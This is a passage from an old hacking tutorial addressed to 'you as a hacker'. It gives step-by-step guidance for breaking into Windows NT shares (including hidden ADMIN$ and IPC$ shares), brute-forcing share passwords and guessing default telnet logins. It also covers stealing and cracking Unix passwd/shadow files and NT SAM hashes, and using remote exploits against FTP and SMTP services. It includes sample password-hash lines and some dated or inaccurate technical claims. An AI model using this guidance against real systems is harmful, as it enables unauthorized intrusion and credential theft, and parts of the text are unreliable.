NT
Until recently, UNIX machines make up the vast majority of machines on the Internet. Windows NT has eaten up some of that percentile. Now, somewhere between 10% and 15% of machines you'll find on the Net are NT boxes. NT machines ship and are compatible with almost as many services as UNIX, with a few differences. Generally, you won't find as many open ports on a Windows box because they don't use raw sockets like the various flavors of Unix (a socket is a two-way connection between two computers, using any protocol). NT Server ships with and FTP server (IIS). Finger servers can also be purchased for NT machines. SMTP and POP (Post Office Protocol) servers come with Microsoft Exchange, which is pretty commonplace. One port that will give your target away as a Windows box is an open port 139. This is the port for NBT, or 'nbsession' according to some portscanners. Unix machines use strictly TCP/P for communications (making them ideal machines for the Internet), whereas NT uses NetBIOS (NetBIOS does not work over the Internet, so NT Servers must utilize NetBIOS over TCP/IP in order to do so), or what they call NetBEUI (NetBIOS Extended User Interface). To connect to an NT machine, you must use Microsoft Client. Using MS Client to connect to a NetBIOS port on a Windows machine is similar in nature to telnetting to port 23 on a UNIX machine. If you have Windows 95 / 98 / NT, you have Microsoft Client. It might not have it installed though. To check, go to Control Panel, then Network. You should then see a list of protocols you have installed on your machine. In order to use MS Client, you need NetBEUI, Client for Microsoft Networks, and (of course) TCP/IP. If you are missing any of these, click on 'Add' and add the appropriate client or protocol (you'll probably need Windows disks). To use MS Client, open a DOS box. The command you will be using is 'net.'
Type 'net' to see a list of Net commands. Some of these cannot be issued from a DOS window. The two you as a hacker should be concerned with are 'net view' and 'net use'. If ever you come across a machine with an open port 139, there is a chance that the machine has open shares on it. A Windows share is a directory somewhere on the server (beit Windows 95, 98, or NT) that is set up to be accessed by others in the network. Sometimes they are password protected, sometimes not. Once connected to a share, you can use regular DOS commands (cd, mkdir, edit, etc.) to move about and manipulate files within it. To look for shares on an NT box with NetBIOS, at a DOS prompt type:
net view \\[ip address]
Again, this will only work if you have NetBEUI, TCP/IP, and Client for Microsoft Networks installed on your computer. If there are any open shares, they will be listed by name after you issue this command. So lets say you net view some.server.net, and are told that there is a share called 'users'. To connect to it, type:
net use [d]: \\[ip address]\[sharename]
or in this case...
net use w: \\some.server.net\users
where w: is the drive letter you are mapping a share to. If you get a 'the command was completed successfully' then you are connected to the share. Change drives to w: (or whatever drive letter you picked) and hit 'dir.' Now, lets say that the share 'users' was 'C:\network\users' on the NT box. Your drive w: is now C:\network\users, though you can't go any higher up the filesystem than where you start. Unlike UNIX, you won't be able to issue a command to see what permissions you have - so you'll just have to try it out. Create and erase a file. Make and delete a directory. You could have only read permissions, or you may have read and write (read files and modify them). If you see a file you want a copy of, do something like this:
type fileIwant.txt > C:\mybox\fileIwant.txt
And it will copy over to your machine. If ever you come across a passworded share, you have a few options on how to get past the protection. You could get the password hashes and crack them with L0phtCrack (explained later). Or, you could write a batch file that connects to the share, then spits passwords from a wordlist (available all over). If you aren't skilled at writing batch files, get yourself a good DOS book, and at least find out about commands and DOS environment variables. You could make yourself quite a powerful brute force share-cracker batch file in under 20 lines. I personally use VB for brute force engine making. Also, if you want to quickly search an entire (or even multiple) subnet(s) for open shares, use a sharescanner such as Legion.
One last thing on shares - often times Administrators hide certain shares. This means that it won’t show up on a Net View. But if you connect to it (Net Use) by name, you will be granted access. Below is a list of common hidden shares:
ADMIN$ (remote administration - can you say root shell?)
IPC$ (these are really fun...)
SMB$ (samba server)
SMBSERVER$
The dollar sign at the ends is what makes it a hidden share. You must include it in your Net Use command. One last note on NT hacking. The WINS (Windows Internet Naming Service) protocol is responsible for translating NetBEUI names (NetBIOS uses computer names instead of addresses) to IP addresses. To look at the WINS configuration of any computer, use the nbtstat command. Furthermore, the file lmhosts.sam on any windows machine will act as a mini WINS table if WINS itself is disabled (TCP/IP properties under Control Panel/Network). What does this mean to you as a hacker? Lets say the NT computer you are trying to break into is 200.23.54.1. Do an nbtstat -A 200.23.54.1 to get its NetBEUI over TCP/IP info. Of importance is any entry with a <20> hex value - this means the computer is sharing (and that you can connect via the NET command, or in the technique I'm about to explain). A <00> means that this is the computer's name. So to connect to the computer, add it to your lmhosts.sam file. The entry would look something like:
200.23.54.1 compname #pre
Then, reload your NBT cache by issuing a nbtstat -R
Your computer now knows how to directly 'NetBEUI into' that machine. Go to Find on your start menu, then Computers, and type in the computer name. If you did everything correctly and have your network configurations correct (see above for instructions on how to do it), that computer will pop up. To connect, just double click on it. I suggest copying a shortcut to your desktop, or your Network Neighborhood.
Novell Netware
Unix machines still claim most machines on the Net. NT is catching up, and between the Posix and Microsoft platforms, you wont find much else on the Internet. Once in a great while, however, you just might run into a completely different operating system. Novell Netware used to be the biggest Client/Server Network Operating System around, and rivals NT to this day. So just in case you run into one of these foreign systems, here is a little info on Novell Netware.
Netware has been around for quite some time - the first version was command-line andd sat on top of DOS. Now GUI (Graphical User Interfaces) clients exist for it, and version 4.5 has been released. Like Windows NT, computing is not centralized (like Unix), and resources are distributed among the network. One computer may be a print server, on might be a mail server, another a file server. The thing that makes Netware unique is what's called the NDS database, or Novell Directory Services. The NDS is comparable to an NT network's PDC's registry. It is a hierarchical representation of the entire network. At the root of the NDS tree is the object 'root,' similar to a root directory. Stemming from the root object, are one or more 'organizational' objects, comparable to subdirectories. Inside these objects can be more organizational objects, or what are known as 'leaf' objects, comparable to files. These leaf objects are what make up the conceptual network. Leaves include user objects, representing users of the network, server objects, representing servers, and so on. The organizational units exist for no other reason to conceptually organize the network. The whole idea of an NDS is sometimes hard to grasp at first, due to its being so abstract, but greatly eases administration.
When you refer to a specific file on a hard disk, you refer to its path. When you refer to an NDS object's location, you refer to its context. Paths start with root at the left, such as:
C:\Winnt\programs\file.ini
Contexts, on the other, hand, start with the root at the right, such as:
.user22.market.UAS
where user22 is the object we are referring to. We don't need to specify root because its assumed that root is always after the last organizational unit listed. The context above specifies the user22 object, which is in the organizational unit 'market,' which resides in the organization 'UAS.' When referring to objects absolutely (full context), you must start the context with a period (.), and separate each entry with a period also. Now if your current working context was .market.UAS (same concept as a current working directory), you could refer to user22 relatively (just as in Unix or DOS filesystems) with simply:
user22
with no period.
Now, Netware networks are usually GUI interfaces. If you ever connect to a Novell server over the Net, you will have to navigate it command line, though. Mapping network drives to Netware volumes (similar to a Windows share) as you would to an NT machine, with the MAP command. You would change your context and navigate the NDS with the CX command. In order to do this, you will need to get your hands on a Netware client. You can get a free command-line client at www.novell.com.
Now a user leaf object on the NDS tree represents each user in a Novell network. So to log in as user22 who's object is in the marketing.UAS container, you have to log in as:
.user22.marketing.UAS
Mapping drives to Netware volumes is done in one of two ways. You can either specify the server name you are connecting to physically, such as:
map x: servername/volumename
or by its NDS object, such as
map x: server_nds_object:volumename
When trying to break into a Novell server on the net, with say, an IP address of 212.14.6.2, you would issue this command (with a Novell client in a DOS box):
map x: 212.14.6.2/volumename
It is beyond the scope of this text to get
into great detail about all the commands and inner workings of Netware, so feel
free to jump into a Netware book. Really.
"Unbelievable
- a Hacker!"
The object of your hack will most likely be to obtain root, i.e.: total control over the network. With a root shell (any shell with root privileges, such as the superuser account) you can read, write, and execute everything on the network (or at least that particular computer). To obtain root, you'll probably have to break in with some other account first. From there you can run a local exploit, download the password file, or whatever.
Sploits
A local sploit (exploit) is a program that exploits some security bug inherent in the operating system, and will greatly increase your access levels, oftentimes to root. There are many exploits out there, for many different network operating systems. One of the most common of these is the Buffer Overflow (also known as a Stack Overflow). This is a technique which when ran, the OS's buffer (a container of memory set aside by the OS for data it's working with) if filled with garbage. When the buffer is "filled," the last string on the stack can be executed, to do such things as initiate a root shell. To use any exploit, of course, you need to have an account that you can log into FTP with and upload the exploit from your computer to the server you want to run it on. You then need to log in via telnet and run it. Exploits are OS and version specific, and it's sometimes hard to find one for a specific one (they are usually available all over the Internet). If this is the case, you'll have to resort to more traditional methods of getting root. Like cracking the password file.
The
Password File
In the /etc directory (UNIX) is a file called passwd, which holds every password for every user, along with some other information. Unfortunately for you, the passwords are encrypted. This means you'll have to download the password file and crack it on your own computer. You'll use a password cracker such as John the Ripper for this. Another security feature system administrators will use to keep hackers out is password shadowing. If shadowing is done (and oftentimes is), all the encrypted passwords will be replaced with *'s or x's. These are not crackable. The real password hashes (encrypted passwords) are most likely on a different file, such as /etc/master.passwd, or /ect/shadow. Look around. To give you an idea of what to look for, here is an encrypted password file:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
Here is a shadowed password file:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
At any rate, when you crack these, depending on the encryption strength and passwords used, you should get a handful of valid usernames and passwords. If you didn't get the root password, you could also use one that belongs to the same group as root (such as admin or sysop). One note about root: a lot of systems are set up so that root cannot log in remotely (from outside). This means you'll have to log in as someone else, then use the 'su' command and enter the root password (su is used for system administrators to jump around from account to account, and stands for 'substitute user.')
NT passwords are a little different. They are kept in the registry, not just a file like Unix, which makes them harder to get your hands on. They are encrypted as well. There are a few ways to get them. Since most of the registry is held in memory while the computer runs, you can do a core dump, or more specifically, a registry dump. You'll need L0phtCrack to do this, and Windows NT (so now might be a good idea to put an NT partition on your hard drive). If you are physically near the NT box you want to hack, just install L0phtCrack and select the Registry Dump option. Otherwise, you have two options on getting the password hashes (encrypted password) over the Internet. If the NT machine allows for remote registry sharing (not common), and you have NT at home, you can extract the password from your target's registry with L0phtCrack. Just enter your target's IP address, and in a few seconds you'll find out if it allows for RRS or not. If not, you have only on option left. Windows NT registries are made up of Hives. Each hive is stored in a *._ file. The hive with the passwords in it is SAM._. So why don't you just download it like a UNIX password file? Because NT is set up not to let anyone see, copy, or modify the SAM hive. Your only hope is to boot your target machine into an alternative OS, like Linux or DOS, then get the file (NT protects the file, DOS and Linux doesn't). This is difficult over the net. It is, however possible. Also, you'll need a program that will allow DOS (which uses the FAT filesystem) or Linux (which uses the EXT2 filesystem) access the partition that SAM._ is on (which is in an NTFS filesystem partition). Once in a while, though, you may come across copies of the hives (all with ._ extensions) stored in a directory like 'repair' or 'reg_backup'. With all the work that it takes to get NT passwords, you're usually better off trying some other method of getting in, like exploits.
Infiltration
Again, every open port (port that you found during your portscan) is a door to the insides of that computer. To find out how each port is a potential point of infiltration for you, you'll need to find out a little more about each protocol. Do some research. For now, I've provided a little info on how you can use these protocols against the computer.
Again, when you log in via a telnet port, it as if you are directly connected to and part of that network. One of the first things you should try is the "front door." Telnet to the machine, and try some commonly used username and password combinations. Next, try each of the email addressed you've collected. About one in twenty people are dumb enough to use their first name or login name as their password (assuming they are allowed to set their own password), so try that too. Chances are this won't work (though its a good idea to try anyways), so you can move on to hacking in through various ports.
Oftentimes the FTP service allows for anonymous logins (logging in with 'ftp' as a username and no password). When you do so, your home directory will be something like /usr/daemon/ftp or /home/ftp. However, if you issue a pwd (to find what directory you're currently in), it will say that your pwd is / (root). This means that you are in a restricted shell. So if after logging in anonymously you cd (change directory) to lib, you will be told that you are in /lib, while you'll really be in /home/ftp/lib, or whatever. System admins like to put /bin's and /etc's in the ftp directory, and in the /etc will be a password file - but don't get your hopes up - 99% of the time its shadowed. Anonymous ftp access is really only helpful if you can download useful information.
If you see an open finger port, this could be the break you were looking for. Use a finger client and do a generic query (no usernames) to possibly get a list of users logged on. Next try putting an @ symbol in front of the domain you are querying, for a list of all users, logged on or not. For specific user information, type in username@domain.
If you see a port called 'nbsession' open, you may also be in luck. This usually means that this particular server is an NT box (much less commonly used than Unix). Refer to the NT section.
The rlogin port may be another point of infiltration. This is kind of like telnet, though older and not as secure. Telnet to it and see what you can do.
The Gopher protocol was used as a text transfer protocol before the days of HTML, the WWW, and graphics on the web. If you come across a gopher port, use a browser with a built in gopher client (newer versions of Navigator and MIE) and connect to it. You'd be amazed as to what the gopher service will sometimes let you see.
Write down any other ports you see. Telnet to them all, and see what happens. If after you telnet in nothing happens, issue commands, hit enter a few times. Play around - as I said before, 80% of what you will know will come from experience, not texts.
Remote Sploits
Another way to use the FTP and SMTP ports against the server is with a remote exploit. Local exploits are those that you execute on the server, whereas remote exploits you launch from your computer. Both can be found on various sploit archives on the Net. Remote, as with local exploits, are service and version specific, in that they exploit a security bug inherent in the programming of the service itself. If the FTP port has the service wu-ftp ver 2.2.4, go out and find the exploit for that exact service of that exact version. If the SMTP port is running sendmail 8.8.8, get the sploit for it. These exploits will be in the form of C code (usually), so you'll need to compile them. Most assume that you have specific header files (*.h), so you may need to find those as well - look at the code to be sure. To make obtaining the header files and compiling the exploits a heck of a lot easier, you ought to think about putting a Linux partition on your hard drive. At any rate, most remote exploits, if correctly implemented, when launched give you root access, or at least access. To find out what service an FTP port is running, telnet to it, it might just tell you. If not, use the SYST command, and then you'll be told. You may have to log in to do so - try doing so anonymously. As far as SMTP, it hides its service software and version much less often that FTP does.